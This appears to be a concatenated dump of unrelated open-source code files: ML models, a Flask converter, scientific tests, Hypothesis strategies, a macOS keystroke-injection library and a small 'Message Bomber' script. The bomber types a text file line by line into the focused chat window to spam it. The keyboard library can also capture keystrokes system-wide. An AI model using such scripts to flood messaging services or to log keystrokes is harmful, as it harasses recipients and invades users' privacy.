infer.JitTraceMarkovEnum_ELBO if jit else infer.TraceMarkovEnum_ELBO
)(max_plate_nesting=2, ignore_jit_warnings=True)
return (infer.JitTraceEnum_ELBO if jit else infer.TraceEnum_ELBO)(
max_plate_nesting=2, ignore_jit_warnings=True
)
@staticmethod
def _sequential_logmatmulexp(logits: torch.Tensor) -> torch.Tensor:
"""
For a tensor ``x`` whose time dimension is -3, computes::
x[..., 0, :, :] @ x[..., 1, :, :] @ ... @ x[..., T-1, :, :]
but does so numerically stably in log space.
"""
batch_shape = logits.shape[:-3]
state_dim = logits.size(-1)
sum_terms = []
# up sweep
while logits.size(-3) > 1:
time = logits.size(-3)
even_time = time // 2 * 2
even_part = logits[..., :even_time, :, :]
x_y = even_part.reshape(
batch_shape + (even_time // 2, 2, state_dim, state_dim)
)
x, y = x_y.unbind(-3)
contracted = _logmatmulexp(x, y)
if time > even_time:
contracted = torch.cat((contracted, logits[..., -1:, :, :]), dim=-3)
sum_terms.append(logits)
logits = contracted
else:
sum_terms.append(logits)
# handle root case
sum_term = sum_terms.pop()
left_term = HMM._contraction_identity(sum_term)
# down sweep
while sum_terms:
sum_term = sum_terms.pop()
new_left_term = HMM._contraction_identity(sum_term)
time = sum_term.size(-3)
even_time = time // 2 * 2
if time > even_time:
new_left_term[..., time - 1 : time, :, :] = left_term[
..., even_time // 2 : even_time // 2 + 1, :, :
]
left_term = left_term[..., : even_time // 2, :, :]
left_sum = sum_term[..., :even_time:2, :, :]
left_sum_and_term = _logmatmulexp(left_term, left_sum)
new_left_term[..., :even_time:2, :, :] = left_term
new_left_term[..., 1:even_time:2, :, :] = left_sum_and_term
left_term = new_left_term
else:
alphas = _logmatmulexp(left_term, sum_term)
return alphas
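
    # Worked note (sketch): for T transition matrices stacked on dim -3, slice
    # [..., t, :, :] of the returned tensor equals the log-space product of
    # matrices 0..t, i.e. an inclusive prefix scan of forward messages computed
    # with logsumexp-matmul instead of ordinary matmul.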
@staticmethod
def _contraction_identity(logits: torch.Tensor) -> torch.Tensor:
batch_shape = logits.shape[:-2]
state_dim = logits.size(-1)
result = torch.eye(state_dim).log()
result = result.reshape((1,) * len(batch_shape) + (state_dim, state_dim))
result = result.repeat(batch_shape + (1, 1))
return result
@property
def z_probs(self) -> torch.Tensor:
r"""
Probability of there being a target-specific spot :math:`p(z=1)`
"""
result = self._sequential_logmatmulexp(pyro.param("z_trans").data.log())
return result[..., 0, 1].exp()
@property
def pspecific(self) -> torch.Tensor:
r"""
Probability of there being a target-specific spot :math:`p(\mathsf{specific})`
"""
return self.z_probs
@property
def m_probs(self) -> torch.Tensor:
r"""
Posterior spot presence probability :math:`q(m=1)`.
"""
return torch.einsum(
"knf,nf->knf",
pyro.param("m_probs").data[1],
self.pspecific,
)
| 1.78125 | 2 |
ude_gym_bridge/gym_env_remote_runner.py | aws-deepracer/ude-gym-bridge | 1 | 12798022 |
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for Gym Environment."""
from typing import Optional, List, Tuple, Union, Any, Iterable
from ude import (
UDEEnvironment,
UDEServer,
UDEStepInvokeType,
Compression, ServerCredentials
)
from ude_gym_bridge.gym_environment_adapter import GymEnvironmentAdapter
class GymEnvRemoteRunner(object):
"""
Gym Environment
"""
def __init__(self,
env_name: str = "CartPole-v0",
agent_name: str = "agent0",
render: bool = True,
step_invoke_type: UDEStepInvokeType = UDEStepInvokeType.WAIT_FOREVER,
step_invoke_period: Union[int, float] = 120.0,
port: Optional[int] = None,
options: Optional[List[Tuple[str, Any]]] = None,
compression: Compression = Compression.NoCompression,
credentials: Optional[Union[ServerCredentials, Iterable[str], Iterable[bytes]]] = None,
auth_key: Optional[str] = None,
timeout_wait: Union[int, float] = 60.0,
**kwargs):
"""
Args:
env_name (str): OpenAI Gym Environment name.
agent_name (str): Name of agent to use.
render (bool): the flag to render OpenAI Gym environment or not.
step_invoke_type (const.UDEStepInvokeType): step invoke type (WAIT_FOREVER vs PERIODIC)
step_invoke_period (Union[int, float]): step invoke period (used only with PERIODIC step_invoke_type)
port (Optional[int]): Port to use for UDE Server (default: 3003)
options (Optional[List[Tuple[str, Any]]]): An optional list of key-value pairs
(:term:`channel_arguments` in gRPC runtime)
to configure the channel.
compression (Compression) = channel compression type (default: NoCompression)
credentials (Optional[Union[ServerCredentials, Iterable[str], Iterable[bytes]]]): grpc.ServerCredentials,
the path to certificate private key and body/chain file, or bytes of the certificate private
key and body/chain to use with an SSL-enabled Channel.
auth_key (Optional[str]): channel authentication key (only applied when credentials are provided).
timeout_wait (Union[int, float]): the maximum wait time to respond step request to UDE clients.
kwargs: Arbitrary keyword arguments for grpc.server
"""
self._adapter = GymEnvironmentAdapter(env_name=env_name,
agent_name=agent_name,
render=render)
self._ude_env = UDEEnvironment(ude_env_adapter=self._adapter)
self._ude_server = UDEServer(ude_env=self._ude_env,
step_invoke_type=step_invoke_type,
step_invoke_period=step_invoke_period,
port=port,
options=options,
compression=compression,
credentials=credentials,
auth_key=auth_key,
timeout_wait=timeout_wait,
**kwargs)
def start(self) -> None:
"""
Start UDE Server.
"""
self._ude_server.start()
def stop(self) -> None:
"""
Stop UDE Server.
"""
self._ude_server.close()
def spin(self) -> None:
"""
Spin till UDE Server terminates.
"""
self._ude_server.spin()
def main():
gym_env = GymEnvRemoteRunner()
gym_env.start()
gym_env.spin()
if __name__ == '__main__':
main()
| 2.015625 | 2 |
my_credentials/config.py | eurodatacube/edc-my-credentials | 0 | 12798023 | # no config for now
| 1.109375 | 1 |
flask_occam/converters.py | bprinty/Flask-Occam | 2 | 12798024 |
# imports
# -------
import re
from werkzeug.routing import BaseConverter
from werkzeug.exceptions import NotFound
# helpers
# -------
MODELS = dict()
def class_registry(cls):
"""
Function for dynamically getting class
registry dictionary from specified model.
"""
    try:
        # SQLAlchemy >= 1.4 keeps the registry here
        return dict(cls._sa_registry._class_registry)
    except AttributeError:
        # fall back for older SQLAlchemy releases
        return dict(cls._decl_class_registry)
def gather_models():
"""
Inspect sqlalchemy models from current context and set global
dictionary to be used in url conversion.
"""
global MODELS
from flask import current_app, has_app_context
if not has_app_context():
return
if 'sqlalchemy' not in current_app.extensions:
return
# inspect current models and add to map
db = current_app.extensions['sqlalchemy'].db
registry = class_registry(db.Model)
for cls in registry.values():
if isinstance(cls, type) and issubclass(cls, db.Model):
# class name
MODELS[cls.__name__] = cls
# lowercase name
MODELS[cls.__name__.lower()] = cls
# snake_case name
words = re.findall(r'([A-Z][0-9a-z]+)', cls.__name__)
if len(words) > 1:
alias = '_'.join(map(lambda x: x.lower(), words))
MODELS[alias] = cls
return
# converters
# ----------
class ModelConverter(BaseConverter):
"""
For url inputs containing a model identifier, look
up the model and return the object.
This method simplifies a lot of the boilerplate needed
to do model look ups in REST apis.
Examples:
.. code-block:: python
@app.route('/users/<id(User):user>')
def get_user(user):
return jsonify(user.json())
In addition, this class can be inherited and used
for other custom parameter url converters. For instance,
here is how you might use it to create a name converter:
.. code-block:: python
class NameConverter(ModelConverter):
__param__ = 'name'
app.url_map.converters['name'] = NameConverter
# ... handlers ...
@app.route('/users/<name(User):user>')
def get_user(user):
return jsonify(user.json())
"""
__param__ = 'id'
def __init__(self, map, model):
self.map = map
self.model = model
return
@property
def models(self):
global MODELS
if not MODELS:
gather_models()
return MODELS
def to_python(self, value):
mapper = self.models
# make sure model exists
if self.model not in mapper:
raise AssertionError(
'Specified model `{}` in url converter '
'not part of application models.'.format(self.model))
# set up class for conversion
cls = mapper[self.model]
# search for the object
model = cls.get(**{self.__param__: value})
if model is None:
raise NotFound
return model
def to_url(self, value):
return super(ModelConverter, self).to_url(getattr(value, self.__param__))
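
# Example registration (sketch, mirroring the NameConverter example in the
# docstring above; assumes a Flask `app` object is in scope):
#
#   app.url_map.converters['id'] = ModelConverter
#
#   @app.route('/users/<id(User):user>')
#   def get_user(user):
#       return jsonify(user.json())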
| 2.375 | 2 |
baselines/tm_generation/h_test_model.py | lhf-labs/tm-dataset | 4 | 12798025 | import os
import json
import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer, AutoTokenizer, GPT2Config
PATH = './models'
OUTPUT_PATH = './output/'
if __name__ == '__main__':
#tokenizer = AutoTokenizer.from_pretrained("./models")
# add the EOS token as PAD token to avoid warnings
#tokenizer = GPT2Tokenizer(config=GPT2Config(**json.load(open(os.path.join(PATH, 'config.json')))))
model = GPT2LMHeadModel(config=GPT2Config(**json.load(open(os.path.join(PATH, 'config.json')))))
#input_ids = tokenizer.encode('', return_tensors='tf')
    # token ids must be integer (Long) tensors for the embedding lookup
    greedy_output = model.generate(torch.zeros((10, 1), dtype=torch.long), max_length=1024+1, min_length=1024+1)
print(list(greedy_output.data[0].numpy()))
for file in ('train', 'valid', 'test'):
with open(os.path.join(OUTPUT_PATH, f'{file}.txt'), 'w') as fout:
data = greedy_output.data
for i in range(len(data)):
elements = list(data[i].numpy())[1:]
for idx, element in enumerate(elements):
fout.write(str(int(element)))
                    if idx < len(elements) - 1:  # no trailing space after the last token
                        fout.write(" ")
fout.write('\n')
| 2.5 | 2 |
Dependencies/pykeyboard/mac.py | CamelBackNotation/hackdfw | 1 | 12798026 | #Copyright 2013 <NAME>
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import time
import Quartz
from AppKit import NSEvent, NSSystemDefined
from .base import PyKeyboardMeta, PyKeyboardEventMeta
# Taken from events.h
# /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/Headers/Events.h
character_translate_table = {
'a': 0x00,
's': 0x01,
'd': 0x02,
'f': 0x03,
'h': 0x04,
'g': 0x05,
'z': 0x06,
'x': 0x07,
'c': 0x08,
'v': 0x09,
'b': 0x0b,
'q': 0x0c,
'w': 0x0d,
'e': 0x0e,
'r': 0x0f,
'y': 0x10,
't': 0x11,
'1': 0x12,
'2': 0x13,
'3': 0x14,
'4': 0x15,
'6': 0x16,
'5': 0x17,
'=': 0x18,
'9': 0x19,
'7': 0x1a,
'-': 0x1b,
'8': 0x1c,
'0': 0x1d,
']': 0x1e,
'o': 0x1f,
'u': 0x20,
'[': 0x21,
'i': 0x22,
'p': 0x23,
'l': 0x25,
'j': 0x26,
'\'': 0x27,
'k': 0x28,
';': 0x29,
'\\': 0x2a,
',': 0x2b,
'/': 0x2c,
'n': 0x2d,
'm': 0x2e,
'.': 0x2f,
'`': 0x32,
' ': 0x31,
'\r': 0x24,
'\t': 0x30,
'\n': 0x24,
'return' : 0x24,
'tab' : 0x30,
'space' : 0x31,
'delete' : 0x33,
'escape' : 0x35,
'command' : 0x37,
'shift' : 0x38,
'capslock' : 0x39,
'option' : 0x3A,
'alternate' : 0x3A,
'control' : 0x3B,
'rightshift' : 0x3C,
'rightoption' : 0x3D,
'rightcontrol' : 0x3E,
'function' : 0x3F,
}
# Taken from ev_keymap.h
# http://www.opensource.apple.com/source/IOHIDFamily/IOHIDFamily-86.1/IOHIDSystem/IOKit/hidsystem/ev_keymap.h
special_key_translate_table = {
'KEYTYPE_SOUND_UP': 0,
'KEYTYPE_SOUND_DOWN': 1,
'KEYTYPE_BRIGHTNESS_UP': 2,
'KEYTYPE_BRIGHTNESS_DOWN': 3,
'KEYTYPE_CAPS_LOCK': 4,
'KEYTYPE_HELP': 5,
'POWER_KEY': 6,
'KEYTYPE_MUTE': 7,
'UP_ARROW_KEY': 8,
'DOWN_ARROW_KEY': 9,
'KEYTYPE_NUM_LOCK': 10,
'KEYTYPE_CONTRAST_UP': 11,
'KEYTYPE_CONTRAST_DOWN': 12,
'KEYTYPE_LAUNCH_PANEL': 13,
'KEYTYPE_EJECT': 14,
'KEYTYPE_VIDMIRROR': 15,
'KEYTYPE_PLAY': 16,
'KEYTYPE_NEXT': 17,
'KEYTYPE_PREVIOUS': 18,
'KEYTYPE_FAST': 19,
'KEYTYPE_REWIND': 20,
'KEYTYPE_ILLUMINATION_UP': 21,
'KEYTYPE_ILLUMINATION_DOWN': 22,
'KEYTYPE_ILLUMINATION_TOGGLE': 23
}
class PyKeyboard(PyKeyboardMeta):
def __init__(self):
self.shift_key = 'shift'
self.modifier_table = {'Shift':False,'Command':False,'Control':False,'Alternate':False}
def press_key(self, key):
if key.title() in self.modifier_table:
self.modifier_table.update({key.title():True})
if key in special_key_translate_table:
self._press_special_key(key, True)
else:
self._press_normal_key(key, True)
def release_key(self, key):
# remove the key
        if key.title() in self.modifier_table:
            self.modifier_table.update({key.title(): False})
if key in special_key_translate_table:
self._press_special_key(key, False)
else:
self._press_normal_key(key, False)
def special_key_assignment(self):
self.volume_mute_key = 'KEYTYPE_MUTE'
self.volume_down_key = 'KEYTYPE_SOUND_DOWN'
self.volume_up_key = 'KEYTYPE_SOUND_UP'
self.media_play_pause_key = 'KEYTYPE_PLAY'
# Doesn't work :(
# self.media_next_track_key = 'KEYTYPE_NEXT'
# self.media_prev_track_key = 'KEYTYPE_PREVIOUS'
def _press_normal_key(self, key, down):
try:
key_code = character_translate_table[key.lower()]
# kCGEventFlagMaskAlternate | kCGEventFlagMaskCommand | kCGEventFlagMaskControl | kCGEventFlagMaskShift
event = Quartz.CGEventCreateKeyboardEvent(None, key_code, down)
mkeyStr = ''
for mkey in self.modifier_table:
if self.modifier_table[mkey]:
if len(mkeyStr)>1: mkeyStr = mkeyStr+' ^ '
mkeyStr = mkeyStr+'Quartz.kCGEventFlagMask'+mkey
if len(mkeyStr)>1: eval('Quartz.CGEventSetFlags(event, '+mkeyStr+')')
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
if key.lower() == "shift":
time.sleep(.1)
except KeyError:
raise RuntimeError("Key {} not implemented.".format(key))
def _press_special_key(self, key, down):
""" Helper method for special keys.
Source: http://stackoverflow.com/questions/11045814/emulate-media-key-press-on-mac
"""
key_code = special_key_translate_table[key]
ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
NSSystemDefined, # type
(0,0), # location
0xa00 if down else 0xb00, # flags
0, # timestamp
0, # window
0, # ctx
8, # subtype
(key_code << 16) | ((0xa if down else 0xb) << 8), # data1
-1 # data2
)
        Quartz.CGEventPost(0, ev.CGEvent())  # NSEvent -> CGEvent for posting
class PyKeyboardEvent(PyKeyboardEventMeta):
def run(self):
tap = Quartz.CGEventTapCreate(
Quartz.kCGSessionEventTap,
Quartz.kCGHeadInsertEventTap,
Quartz.kCGEventTapOptionDefault,
Quartz.CGEventMaskBit(Quartz.kCGEventKeyDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventKeyUp),
self.handler,
None)
loopsource = Quartz.CFMachPortCreateRunLoopSource(None, tap, 0)
loop = Quartz.CFRunLoopGetCurrent()
Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
Quartz.CGEventTapEnable(tap, True)
while self.state:
Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)
def handler(self, proxy, type, event, refcon):
key = Quartz.CGEventGetIntegerValueField(event, Quartz.kCGKeyboardEventKeycode)
if type == Quartz.kCGEventKeyDown:
self.key_press(key)
elif type == Quartz.kCGEventKeyUp:
self.key_release(key)
if self.capture:
Quartz.CGEventSetType(event, Quartz.kCGEventNull)
return event
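
# Usage sketch (real key events are posted to the OS, so run with care):
#
#   k = PyKeyboard()
#   k.press_key('shift')
#   k.press_key('a'); k.release_key('a')   # types 'A'
#   k.release_key('shift')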
| 1.65625 | 2 |
python/features/tfeat.py | albutko/vlb | 1 | 12798027 |
"""
TFeat Implementation
Author: <NAME>
"""
import sys
import os
import torch
from torch import nn
import torch.nn.functional as F
import numpy as np
import cv2
from features.DetectorDescriptorTemplate import DetectorAndDescriptor
import features.feature_utils as utils
dirname = os.path.dirname(__file__)
class tfeat(DetectorAndDescriptor):
def __init__(self, pretrained_model='tfeat_misc/tfeat-liberty.params'):
super(
tfeat,
self).__init__(
name='tfeat',
is_detector=False,
is_descriptor=True,
is_both=False,
patch_input=True,
can_batch=True)
self.model = TNet()
pretrained_model = os.path.join(dirname, pretrained_model)
self.model.load_state_dict(torch.load(pretrained_model, map_location='cpu'))
self.model.eval()
def extract_descriptors_from_patch_batch(self, batch):
nb_patches = batch.shape[0]
        batch_resized = []
        for patch in batch:
            batch_resized.append(cv2.resize(patch, (32, 32), interpolation=cv2.INTER_AREA))
        # stack into one ndarray first; torch.tensor on a list of arrays is slow and deprecated
        batch_resized = torch.tensor(np.array(batch_resized))
batch_resized = batch_resized.view(nb_patches,1,32,32)
desc = self.model(batch_resized.float())
return desc.detach().numpy()
def extract_descriptors_from_patch(self, patch):
patch = cv2.resize(patch, (32, 32), interpolation=cv2.INTER_AREA)
patch = torch.tensor(patch)
patch = patch.view(1,1,32,32)
desc = self.model(patch.float())
return desc.detach().numpy()
def extract_descriptor(self, image, feature):
gray_image = utils.all_to_gray(image)
patches = []
for f in feature:
patch = utils.extract_patch(gray_image, f, patch_sz=32)
patches.append(patch)
patches = np.array(patches)
desc = self.extract_descriptors_from_patch_batch(patches)
return desc
class TNet(nn.Module):
"""TFeat model definition
"""
def __init__(self, pretrained_model=None):
super(TNet, self).__init__()
self.features = nn.Sequential(
nn.InstanceNorm2d(1, affine=False),
nn.Conv2d(1, 32, kernel_size=7),
nn.Tanh(),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(32, 64, kernel_size=6),
nn.Tanh()
)
self.descr = nn.Sequential(
nn.Linear(64 * 8 * 8, 128),
nn.Tanh()
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.descr(x)
return x
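
# Usage sketch (stand-in random patches; the bundled weights in
# tfeat_misc/tfeat-liberty.params are loaded by the tfeat constructor):
#
#   extractor = tfeat()
#   patches = np.random.rand(8, 32, 32).astype(np.float32)
#   descs = extractor.extract_descriptors_from_patch_batch(patches)  # (8, 128)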
| 1.921875 | 2 |
tests/integration/test_mzml_input.py | Linington-Lab/metabolate- | 1 | 12798028 |
import os
import tempfile
from pathlib import Path
from zipfile import ZipFile
import shutil
import pandas as pd
import numpy as np
import time
from npanalyst import configuration, cli
from pandas._testing import assert_series_equal
# # Helper functions
def dataframe_assertion(reference_path, test_path):
"""This function reads the respective dataframe and compares
the two files."""
result_table = pd.read_csv(reference_path)
# # This resorting is just a safe-guard to assure that rows are ordered properly and error messages are
# # due to wrong values, not due to interchanged rows
result_table.sort_values(
by=["UniqueFiles", "PrecMz", "RetTime"], ignore_index=True, inplace=True
)
test_table = pd.read_csv(Path(test_path))
test_table.sort_values(
by=["UniqueFiles", "PrecMz", "RetTime"], ignore_index=True, inplace=True
)
assert_series_equal(result_table["UniqueFiles"], test_table["UniqueFiles"])
assert np.sum(result_table["PrecMz"] - test_table["PrecMz"]) < 0.1
assert np.sum(result_table["RetTime"] - test_table["RetTime"]) < 0.1
# # Define relative path to input files
HERE = Path(__file__).parent
# mzML files
INPUT_MZML_FILES = HERE / "data/BioMAP_mzml_input.zip"
# Replicate compared basketed CSVs
OUTPUT_FILE_REPLICATED = HERE / "data/replicated_mzml_result.zip"
# Basketed CSV file output
OUTPUT_FILE_BASKETED = HERE / "data/basketed_mzml.csv"
# # Test config settings (ms parameter and AS and CS threshold)
def test_config_parameter():
"""This test shall guarantee that the loaded settings are identical to those, used to
obtain the reference/ground truth results."""
configd = configuration.load_config(config_path=None)
print(configd)
assert configd["ACTIVITYTHRESHOLD"] == 2
assert configd["CLUSTERTHRESHOLD"] == 0.3
assert configd["MINREPSREPLICATES"] == 2
assert configd["MINREPSBASKETS"] == 1
assert configd["ERRORINFO"]["PrecMz"] == ("ppm", 30.0)
assert configd["ERRORINFO"]["RetTime"] == ("window", 0.03)
assert configd["MININTENSITY"] == 2e3
def test_mzml_replicate_comparison():
"""Test for the replicate comparison step. The BioMAP mzML dataset is used to generate the
replicate-compared csv files. A full dataframe by dataframe comparison is performed to ensure
identical csv files."""
# # Create temporary folder for result and test files
tmpdir = tempfile.mkdtemp()
# # Open and extract zip file that contains the 2775 mzML files
with ZipFile(Path(INPUT_MZML_FILES), "r") as zip:
zip.extractall(Path(tmpdir, "mzml_files"))
# # Perform replicate comparison
cli.run_replicate(
input_path=Path(tmpdir, "mzml_files"),
output_path=Path(tmpdir),
workers=-2,
verbose=False,
config=None,
)
# # Test length of generated replicated files (=925)
length = len(os.listdir(Path(tmpdir, "replicated")))
assert length == 925
# # Get replicated zip output file with expected output files and extract them
with ZipFile(Path(OUTPUT_FILE_REPLICATED), "r") as zip:
zip.extractall(Path(tmpdir, "expected_replicated_results"))
# # Catch all csv files from the expected results
replicate_file_names = os.listdir(Path(tmpdir, "expected_replicated_results"))
# # Compare the expected replicated files with the produced files
for rep in replicate_file_names:
dataframe_assertion(
reference_path=Path(tmpdir, "expected_replicated_results", rep),
test_path=Path(tmpdir, "replicated", rep),
)
# # Remove temporary folder. Windows would not delete all files.
# # Python 3.11 seems to enable the ignore_errors function also for tempfile.TemporaryDirectory() which
# # is the nicer context manager option.
# shutil.rmtree(tmpdir, ignore_errors=True)
def test_mzml_basket_building():
"""Test for basket building step. A folder with expected replicate-compared output CSVs is used
as the input. The resulting basket.csv file is compared to an expected output file. A full dataframe by dataframe
comparison is performed to ensure identical csv files."""
# # Create temporary folder for result and test files
tmpdir = tempfile.mkdtemp()
# # Get replicated zip output file with expected output files and extract them
with ZipFile(Path(OUTPUT_FILE_REPLICATED), "r") as zip:
zip.extractall(Path(tmpdir))
cli.run_basketing(
input_path=Path(tmpdir), output_path=Path(tmpdir), verbose=False, config=None
)
# # Compare the expected basketed file with the produced file
dataframe_assertion(
reference_path=Path(OUTPUT_FILE_BASKETED),
test_path=Path(tmpdir, "basketed.csv"),
)
# # Remove the temp folder
shutil.rmtree(tmpdir, ignore_errors=True)
# if __name__ == "__main__":
#
# start = time.time()
#
# test_mzml_basket_building()
#
# test_mzml_replicate_comparison()
#
# test_mzml_basket_building()
#
# print(f"This testing took: {(time.time() - start) / 60:.2f} minutes.")
| 2.296875 | 2 |
axiom/test/strategies.py | opacam/axiom | 23 | 12798029 | """
Hypothesis strategies for generating Axiom-related data.
"""
from epsilon.extime import Time
from hypothesis import strategies as st
from hypothesis.extra.datetime import datetimes
from axiom.attributes import LARGEST_NEGATIVE, LARGEST_POSITIVE
def axiomText(*a, **kw):
"""
Strategy for generating Axiom-compatible text values.
"""
return st.text(
alphabet=st.characters(
blacklist_categories={'Cs'},
blacklist_characters={u'\x00'}),
*a, **kw)
def textlists():
"""
Strategy for generating lists storable with L{axiom.attributes.textlist}.
"""
return st.lists(st.text(
alphabet=st.characters(
blacklist_categories={'Cs'},
blacklist_characters={u'\x00', u'\x02', u'\x1f'})))
def axiomIntegers(minValue=LARGEST_NEGATIVE, maxValue=LARGEST_POSITIVE):
"""
Strategy for generating Axiom-compatible integers.
@type minValue: L{int}
@param minValue: Minimum value to generate; default is the least value
that can be stored in an L{axiom.attributes.integer} attribute.
    @type maxValue: L{int}
    @param maxValue: Maximum value to generate; default is the greatest value
that can be stored in an L{axiom.attributes.integer} attribute.
"""
return st.integers(min_value=minValue, max_value=maxValue)
def timestamps(*a, **kw):
"""
Strategy for generating L{epsilon.extime.Time} objects.
"""
return st.builds(Time.fromDatetime, datetimes(timezones=[], *a, **kw))
def fixedDecimals(precision, minValue=None, maxValue=None):
"""
Strategy for generating L{decimal.Decimal} values of a fixed precision.
@type precision: L{decimal.Decimal}
@param precision: The precision to use; for example, C{Decimal('0.01')} for
a L{axiom.attributes.point2decimal} attribute.
@type minValue: L{decimal.Decimal}
@param minValue: The minimum value to generate, or C{None} for the least
possible.
    @type maxValue: L{decimal.Decimal}
    @param maxValue: The maximum value to generate, or C{None} for the greatest
possible.
"""
if minValue is None:
minValue = LARGEST_NEGATIVE
else:
minValue = int(minValue / precision)
if maxValue is None:
maxValue = LARGEST_POSITIVE
else:
maxValue = int(maxValue / precision)
return st.integers(min_value=minValue, max_value=maxValue).map(
lambda v: v * precision)
__all__ = [
'axiomText', 'axiomIntegers', 'fixedDecimals', 'timestamps', 'textlists']
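
# Example sketch (hypothesis's real `@given` decorator, shown for illustration):
#
#   from decimal import Decimal
#   from hypothesis import given
#
#   @given(fixedDecimals(Decimal('0.01'), minValue=Decimal('0')))
#   def test_price(price):
#       assert price >= 0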
| 2.84375 | 3 |
nets/VGG16.py | SekiroRong/YOLOP | 1 | 12798030 |
# -*- coding = utf-8 -*-
# @Time : 2022/1/8 15:41
# @Author : 戎昱
# @File : VGG16.py
# @Software : PyCharm
# @Contact : <EMAIL>
# @github : https://github.com/SekiroRong
import math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
#-------------------------------------------------#
# MISH激活函数
#-------------------------------------------------#
class Mish(nn.Module):
def __init__(self):
super(Mish, self).__init__()
def forward(self, x):
return x * torch.tanh(F.softplus(x))
#---------------------------------------------------#
# 卷积块 -> 卷积 + 标准化 + 激活函数
# Conv2d + BatchNormalization + Mish
#---------------------------------------------------#
class BasicConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1):
super(BasicConv, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, kernel_size//2, bias=False)
self.bn = nn.BatchNorm2d(out_channels)
self.activation = Mish()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.activation(x)
return x
class VGG16(nn.Module):
def __init__(self):
super(VGG16, self).__init__()
self.layer1 = BasicConv(3, 32, 3)
self.layer2 = BasicConv(32, 64, 3)
self.layer3 = BasicConv(64, 128, 3)
self.layer4 = BasicConv(128, 256, 3)
self.maxpool = nn.MaxPool2d(2)
def forward(self,x):
x = self.maxpool(self.layer1(x))
x = self.maxpool(self.layer2(x))
x = self.maxpool(self.layer3(x))
x = self.layer4(x)
return x
# import torch
# from torchsummary import summary
#
# if __name__ == "__main__":
# # 需要使用device来指定网络在GPU还是CPU运行
# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# m = VGG16().to(device)
#     summary(m, input_size=(3, 640, 480))  # 3 input channels, matching BasicConv(3, 32, 3)
| 2.3125 | 2 |
Message Bomber/Message Bomber using File.py | SaiAshish-Konchada/Python-Projects-for-Beginners | 5 | 12798031 | # importing the required libraries
import pyautogui, time
# delay to switch windows
time.sleep(10)
# content you want to spam with
with open("idoc.pub_green-lantern-movie-script.txt", 'r') as f:
    # loop to spam
    for line in f:
        # fetch and type each line from the file
        pyautogui.write(line)
        # press enter to send the message
        pyautogui.press('enter')
| 3.09375 | 3 |
kgcnn/ops/scatter.py | thegodone/gcnn_keras | 47 | 12798032 | import tensorflow as tf
@tf.function
def tensor_scatter_nd_ops_by_name(segment_name, tensor, indices, updates, name=None):
"""Scatter operation chosen by name that pick tensor_scatter_nd functions.
Args:
segment_name (str): Operation to update scattered updates. Either 'sum' or 'min' etc.
tensor (tf.Tensor): Tensor to scatter updates into.
indices (tf.Tensor): Indices to for updates.
updates (tf.Tensor): Updates of new entries for tensor.
name (str): Name of the tensor.
Returns:
tf.Tensor: Updates scattered into tensor with different update rules.
"""
if segment_name in ["segment_sum", "sum", "reduce_sum", "add"]:
pool = tf.tensor_scatter_nd_add(tensor, indices, updates, name=name)
elif segment_name in ["segment_max", "max", "reduce_max"]:
pool = tf.tensor_scatter_nd_max(tensor, indices, updates, name=name)
elif segment_name in ["segment_min", "min", "reduce_min"]:
pool = tf.tensor_scatter_nd_min(tensor, indices, updates, name=name)
else:
        raise TypeError("Unknown pooling, choose: 'sum', 'max' or 'min'.")
return pool
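
if __name__ == "__main__":
    # Minimal sketch: scatter-add two row updates into a zeroed node-feature tensor.
    nodes = tf.zeros((4, 3))
    idx = tf.constant([[0], [2]])  # write into rows 0 and 2
    upd = tf.ones((2, 3))
    print(tensor_scatter_nd_ops_by_name("sum", nodes, idx, upd))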
| 3.015625 | 3 |
Latest/venv/Lib/site-packages/pyface/wx/shell.py | adamcvj/SatelliteTracker | 1 | 12798033 |
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought util package component>
#------------------------------------------------------------------------------
"""The PyCrust Shell is an interactive text control in which a user types in
commands to be sent to the interpreter. This particular shell is based on
wxPython's wxStyledTextCtrl. The latest files are always available at the
SourceForge project page at http://sourceforge.net/projects/pycrust/.
Sponsored by Orbtech - Your source for Python programming expertise."""
from __future__ import print_function
__author__ = "<NAME> <<EMAIL>>"
__cvsid__ = "$Id: shell.py,v 1.2 2003/06/13 17:59:34 dmorrill Exp $"
__revision__ = "$Revision: 1.2 $"[11:-2]
from wx.wx import *
from wx.stc import *
import keyword
import os
import sys
from wx.py.pseudo import PseudoFileIn, PseudoFileOut, PseudoFileErr
from wx.py.version import VERSION
# local imports
from .drag_and_drop import PythonObject
